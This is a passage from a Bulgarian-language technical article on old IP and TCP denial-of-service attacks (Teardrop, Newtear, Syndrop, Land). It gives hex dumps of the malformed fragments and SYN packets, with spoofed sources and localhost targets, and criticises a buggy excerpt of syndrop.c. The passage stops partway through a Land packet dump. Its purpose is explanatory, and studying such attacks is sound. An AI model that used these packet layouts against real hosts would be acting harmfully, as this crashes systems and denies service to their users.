+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Packet #2:
IP Header:
1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL | TOS | Total Length |
| 4 | 5 | 00 | 00 34 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
| 00 22 | DF | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| TTL | Protocol | Header Checksum |
| 40 | 06 = TCP | (filled by kernel) 3C A0 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address |
| 7F 00 00 01 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination address (at test = localhost) |
| 7F 00 00 01 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
TCP Header:
1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Port | Destination Port |
| 04 02 | 00 8B |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Sequence Number |
| FE 1D EE D9 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Acknowledgement Number |
| FE 2F 2F 9B |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Offset | (reserved)| Flags | Window |
| 8 | 0 | ACK | 79 60 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Checksum | Urgent Pointer |
| 21 34 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Danni:
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 01 01 08 0A |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 39 5F 32 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 39 5F 32 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Packet #3
IP Header:
1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL | TOS | Total Length |
| 4 | 5 | 00 | 00 37 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
| 00 23 | DF | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| TTL | Protocol | Header Checksum |
| 40 | 06 = TCP | (filled by kernel) 3C 9C |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address |
| 7F 00 00 01 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination address (at test = localhost) |
| 7F 00 00 01 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
TCP Header:
1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Port | Destination Port |
| 04 02 | 00 8B |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Sequence Number |
| FE 1D EE D9 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Acknowledgement Number |
| FE 2F 2F 9B |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Offset | (reserved)| Flags | Window |
| 8 | 0 |URG+ACK+PSH| 79 60 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Checksum | Urgent Pointer |
| 79 8C | 00 03 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Danni:
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 01 01 08 0A |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 39 5F 32 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 39 5F 32 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 42 (B) 79 (y) 65 (e)| (Bye)
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
****************************************************************************
2.2.2.1. Teardrop
-----------------
Teardrop, izvesten oshte kato Fragment Overlap Bug, e DoS ataka, koiato se
celi tochno v bugovete v obshtia mrezhov kod na operacionnite sistemi,
prepisan brutalno ot BSD UNIX.
Teardrop be otkrit na 3-Nov-1997, kato zabivashe Linux, Win95, WinNT i oshte
kup drugi operacionni sistemi. Vsushtnost se bazira ne na greshka, ami na
nedoglezhdane - "znaehme za tozi propusk, no si kazahme - che koi idiot shte
prashta takiva paketi?" ;-)
Teardrop se sustoi v izprashtaneto na pripokrivashti se fragmenti ot paket.
Fragmentaciata na paketite e neshto mnogo vazhno pri Internet protokola,
zashtoto pozvoliava daden goliam paket da bude razcepen na niakolko
po-malki, koito veche mogat da pristignat i po razlichni marshruti do
poluchatelia, koito sled tova si gi sglobiava. Za da se poluchi
sglobiavaneto pravilno, v IP headera ima dve poleta za dazi cel, a imenno
Flags i Fragment Offset.
Flagovete sa DF (Do not fragment) - vdiga se vuv fragmentite, za da niama
povtorna fragmentacia, i MF (More Fragments) - dali se chakat oshte
fragmenti. No ne tova e vazhnoto.
Vazhnoto e Fragment Offset-a. Toi kazva na kakvo otmestvane v originalnia
paket bi triabvalo da se pliasnat dannite ot tekushtia fragment. V purvia
fragment tova pole e 0 - na otmestvane 0 e nachaloto na paketut. V
sledvashtite fragmenti tuk veche se ukazva otmestvaneto, v 8-baitovi
inkrementi.
I taka, ideiata na Teardrop e da se izprati purvo normalen fragment (koito
pri tova sudurzha celite danni), sled koito drug, chieto otmestvane popada
vutre v purvia (pripokriva go), no chiato dulzhina ne mu pozvoliava da
pokrie napulno purvia fragment (t.e. vtoriat e izcialo niakude vutre v
puirvia).
Originalniat teardrop.c izprashta paket, koito sudurzha v sebe si (osven IP
header-a) UDP header (8 baita) i pulnezh (28 baita), t.e. polezno
sudurzhanie 36 baita (na praktika sudurzha v sebe si celia deklariran UDP
paket). Sled nego se izprashta vtori fragment, koito obache e s otmestvane
24 baita, s dulzhina 4 baita... I bum :-)
Eto kak izglezhdat izpratenite ot teardrop.c danni:
Fragment #1:
IP Header:
1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL | TOS | Total Length |
| 4 | 5 | 00 | 00 38 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
| 00 F2 | MF | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| TTL | Protocol | Header Checksum |
| 40 | 11 = UDP | (filled by kernel) C0 A6 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address (spoofed sample) |
| 0C 0D 0E 0F |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination address (at test = localhost) |
| 7F 00 00 01 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
UDP Header:
1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Port (random) | Destination Port (random) |
| 86 BF | C8 D0 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Length | Checksum |
| 00 24 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Danni:
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Fragment #2:
IP Header:
1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL | TOS | Total Length |
| 4 | 5 | 00 | 00 18 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
| 00 F2 | | 00 03 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| TTL | Protocol | Header Checksum |
| 40 | 11 = UDP | (filled by kernel) E0 C3 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address (spoofed sample) |
| 0C 0D 0E 0F |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination address (at test = localhost) |
| 7F 00 00 01 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Danni (sushtite ot nachaloto na minalia paket):
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 86 BF C8 D0 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
****************************************************************************
2.2.2.2. Newtear
----------------
Newtear e vid Teardrop ataka, koiato zasiaga Win 95 i NT4 s vsichki
prilozheni patchove, dostupni po onova vreme (8-Jan-1998). Linux ne e
zasegnata, ostanalite UNIX-i ne sa bili testvani po onova vreme (na men
sushto ne mi e izvestno drug UNIX da strada ot tozi bug).
Razlikata mezhdu Newtear i normalnia Teardrop e, che Newtear izprashta kato
za nachalo paket s po-maluk pulnezh (20 vmesto 28 baita), kato osven tova
falshificira razmerut na UDP dannite (slaga go dva puti po-goliam, otkolkoto
e naistina). UDP header-ut obache e oshte 8 baita, t.e. sudurzhanieto na
purvia fragment (bez IP headera) e 28 baita, a vtoria si e sushto kakto i
pri originalnia Teardrop - ot otmestvane 24.
Taka izpratenite paketi predizvikvat sin ekran i pri dvete operacionni
sistemi.
Fragment #1:
IP Header:
1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL | TOS | Total Length |
| 4 | 5 | 00 | 00 30 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
| 00 F2 | MF | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| TTL | Protocol | Header Checksum |
| 40 | 11 = UDP | (filled by kernel) C0 AE |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address (spoofed sample) |
| 0C 0D 0E 0F |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination address (at test = localhost) |
| 7F 00 00 01 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
UDP Header:
1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Port (random) | Destination Port (random) |
| 85 61 | 54 5B |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Length | Checksum |
| 00 30 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Danni:
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Fragment #2:
IP Header:
1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL | TOS | Total Length |
| 4 | 5 | 00 | 00 18 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
| 00 F2 | | 00 03 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| TTL | Protocol | Header Checksum |
| 40 | 11 = UDP | (filled by kernel) E0 C3 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address (spoofed sample) |
| 0C 0D 0E 0F |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination address (at test = localhost) |
| 7F 00 00 01 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Danni (sushtite ot nachaloto na minalia fragment):
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 85 61 54 5B |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
****************************************************************************
2.2.2.3. Syndrop
----------------
Syndrop predstavliava normalen Teardrop, koito obache osven tova atakuva i
SYN sequence bug-a na Microsoft. Za da mozhe da stane tova, vmesto UDP
triabva da se izprati TCP paket (za da ima SYN). Tova pone e opisanieto na
avtorite.
Ponezhe ataki kato Newtear i Syndrop se bazirat na Teardrop, logichno e da
ochakvame da vidim prosto originalnia source (teardrop.c) s niakakvi
izmenenia. I tova naistina e taka.
Za suzhalenie, kogato se zachetoh po-vnimatelno v syndrop.c, vidiah edin
bug, koito iavno e ubiagnal na avtorite (ne znam dali vuobshte niakoi go e
zabeliazal, povecheto hora imat navika prosto da kompilirat DoS atakata i
napravo da ia izpolzvat, bez vuobshte da se pointeresuvat kak raboti). A
kato se zachetoh oshte po-vnimatelno, napravo mi stana losho...
Bugut se sustoi v tova, che avtorut e propusnal da promeni edin-dva reda ot
originalnia teardrop.c. Taka che toi zadelia pamet za paket s dulzhina
ip_header+udp_header+danni i deklarira v IP headera, che dulzhinata na
paketa e 48 baita. Da, ama posle izprashta sus sendto()
ip_header+tcp_header+danni, koeto pravi tochno 60 baita.
Sled razglezhdane s tcpdump na poluchenia paket se vizhda, che v izpratenia
IP header vse pak e deklarirano 60 baita, t.e. Linux, osven, che populva
checksum, populva i validen total length na paketa. I vse pak tozi primer
pokazva kolko murliavo mogat da budat napisani programi ot podobno estestvo.
Oshte poveche, kogato avtorut im dori ne e napisal programata sam, a e
modificiral veche sushtestvuvashta.
Da ne govorim, che sled kato avtorut e zadelil pamet za 48 baita paket, e i
nuliral samo tolkova pamet. Sled tova obache izprashta 60 baita, t.e. ot
paketa samo 48 baita sa pulni s nuli (kato izkliuchim tezi, koito sa bili
promeneni, za da se formirat headerite), a ostanalite 12 sa s niakakvo
proizvolno sudurzhanie. Tova bi triabvalo da povliae po niakakuv nachin na
kontrolnata suma v TCP (ne IP, a TCP) headera.
Vmesto obache avtorut na programata da si igrae da izchisliava TCP checksum
vseki put (ne, che e koi znae kolko slozhno), toi izpolzva predvaritelno
gotova takava - 0x44, koeto v big endian oznachava 0x4400.
Tuk obache iavno pak se namesva nekompetentnostta na avtora. Toi vuobshte ne
uspiava da formira TCP headera kato horata. Za da ne buda golosloven, eto i
edno malko fragmentche kod, predstavliavashto zhaluk opit za formirane na
tcp header, pridruzheno s malko komentari ot moia milost. Za da imate vse
pak niakakva predstava ot tova, koeto se opitva da napravi avtorut obache,
neka purvo da pokazha strukturata na TCP headera:
1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Port | Destination Port |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Sequence Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Acknowledgement Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Offset | (reserved)| Flags | Window |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Checksum | Urgent Pointer |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Options.... (Padding) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Eto tova predstavliava edin TCP Header. Poleto Options ne e zadulzhitelno, i
v nashia sluchai to shte lipsva. I taka, eto kakvo pravi avtorut na
syndrop.c (prosto za poiasnenie - p_ptr e pointer kum dannite, koito triabva
da se populniat v momenta. htons() e standartna funkcia ot netinet/in.h -
"host to network short", koiato, ako e neobhodimo, ot little endian pravi
big endian 2-baitovi dumi):
----- cut ----- cut ----- cut -----
*((u_short *)p_ptr) = htons(src_prt); /* Populva source port */
p_ptr += 2; /* i minavame kum dest */
*((u_short *)p_ptr) = htons(dst_prt); /* Populva dest. port */
p_ptr += 2; /* i minava kum sequence */
*((u_long *)p_ptr) = seq1; /* populva sequence # */
p_ptr += 4; /* i minava kum ack.# */
*((u_long *)p_ptr) = 0; /* populva ack.# */
p_ptr += 4; /* i minava kum offset */
/* Do tuk vsichko e nared, da vidim sega kakvo shte napravi */
*((u_short *)p_ptr) = htons(8 + PADDING*2);
/* Opaaa... opitva se da slozhi Data Offset 48 baita, no mai
propuska malkata podrobnost, che poleto offset e samo
4 bita, a ne 2 baita, pri tova ne se izmerva v baitove, a
v 4-baitovi dumi */
p_ptr += 2; /* Tova go prashta na pole Window */
*((u_char *)p_ptr) = TH_SYN;
/* No toi iavno si misli, che e na flags, koeto dori ne e
cial bait */
p_ptr += 1; /* otiva v starshia bait na Window */
*((u_short *)p_ptr) = seq2-seq1;
/* kudeto se opitva da zapishe 2 baita (istinskia window), bez
dori da si napravi truda da gi oburne v
big endian s htons()... */
*((u_short *)p_ptr) = 0x44;
/* checksum : this is magic value for NT, W95. dissasemble
M$ C++ to see why, if you have time */
/* bednichkiat... iavno si vuobraziava, che zapisva checksum...
bez dori da uvelichi p_ptr, a iavno e zabravil i za htons() */
*((u_short *)p_ptr) = 0; /* urgent */
/* a tuk se opitva da zapishe poleto urgent... uvi, pak bez da
uvelichi p_ptr */
----- cut ----- cut ----- cut -----
Ami kakvo da vi obiasniavam... Poveche niama da komentiram nekompetentnostta
na avtora. A mozhe bi puk prosto source-ut e bil osakaten sled kato toi go e
napisal? Ne mi se viarva.
Kakvato i da e prichinata, mnogo mi se iska da razbera dali pone ideiata
raboti, ili chovekut prosto e napisal neshto, pusnal go e, to e zabilo
niakoi star Windows (zashtoto, vupreki nesgodite, pone teardrop-chastta ne e
uspial da opropasti), i si e pomislil, che e otkril neshto novo. A mozhe bi
nikoga niama da razbera. Taka ili inache, za men tazi DoS ataka e otpisana.
****************************************************************************
2.2.3. Land
-----------
Land.c se poiavi na bial sviat na 20-Nov-1997, 17 dena sled Teardrop. V
komentara v nachaloto na source-a se kazva prosto "crashes a win95 box", no
na praktika Land bug (greshkata, koiato kara mashinata da zabie)
sushtestvuva v pochti vsichki operacionni sistemi, imenno zaradi obshtia BSD
mrezhov kod.
Celta e da se izprati sinhronizacionen (SYN) paket do _OTVOREN_ TCP port, v
koito paket source i destination IP, kakto i source i destination ports sa
edin i sushti, a imenno tezi na zhertvata. I, kakto beshe kazal ManiaX vuv
Phreedom #8, "sled koeto mashinkata pochva da si govori sama, a znaete kvo
stava s oneq deto si govorqt sami" ;-)
Pri niakoi operacionni sistemi kompiuturut mozhe i da ne zabie. Nosiat se
razni sluhove za Dual-processor PPro pod WinNT, na koito obache CPU usage-ut
mu skochil na 99%. E, za men tova si e chisto zabivane.
Avtorut na land.c (FLC) iavno e vzel primer ot programista, suzdal
EXE-failovete i slozhil inicialite si v headera (.EXE failovete sapochvat
sus simvolite MZ), taka che ne e sluchaino, che fragment id-to na paketa,
kakto i sequence number-a, sa 0xF1C (FLC) ;-)
Skoro sled tova na bial sviat se poiavi i druga programka, Latierra. Tia
pozvoliavashe da se izprashta ne samo edin, ami mnogo paketi na edno
puskane, osven tova mozheshe da se zadadat i nachalen i kraen port, taka che
otpadashe nuzhdata da tursite otvoreni portove na vrazheskata mashina, ami
mozheshe prosto da kazhete "prashtai paketi ot tozi do tozi port" i da se
nadiavate vse niakoi da e otvoren.
Dopulnitelno novovuvedenie v Latierra beshe i tova, che vdiga i PUSH flag-ut
na SYN paketite, makar che chrez opcii na komandnia red mozhete i sami da
opredelite koi flagove da sa vdignati.
Eto kak izglezhda Land ataka, osushtestvena ot originalnia land.c:
IP Header:
1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL | TOS | Total Length |
| 4 | 5 | 00 | 00 28 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Identification (autor initials)|Flags| Fragment Offset |
| 0F 1C | | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| TTL | Protocol | Header Checksum |
| FF | 06 = TCP | (filled by kernel) AE B1 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address (same as destination) |
| 7F 00 00 01 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination address (at test = localhost) |
| 7F 00 00 01 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
TCP Header:
1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Port (at test) | Destination Port (same) |
| 00 15 | 00 15 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Sequence Number |
| 00 00 0F 1C |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Acknowledgement Number |
| 00 00 00 00 |
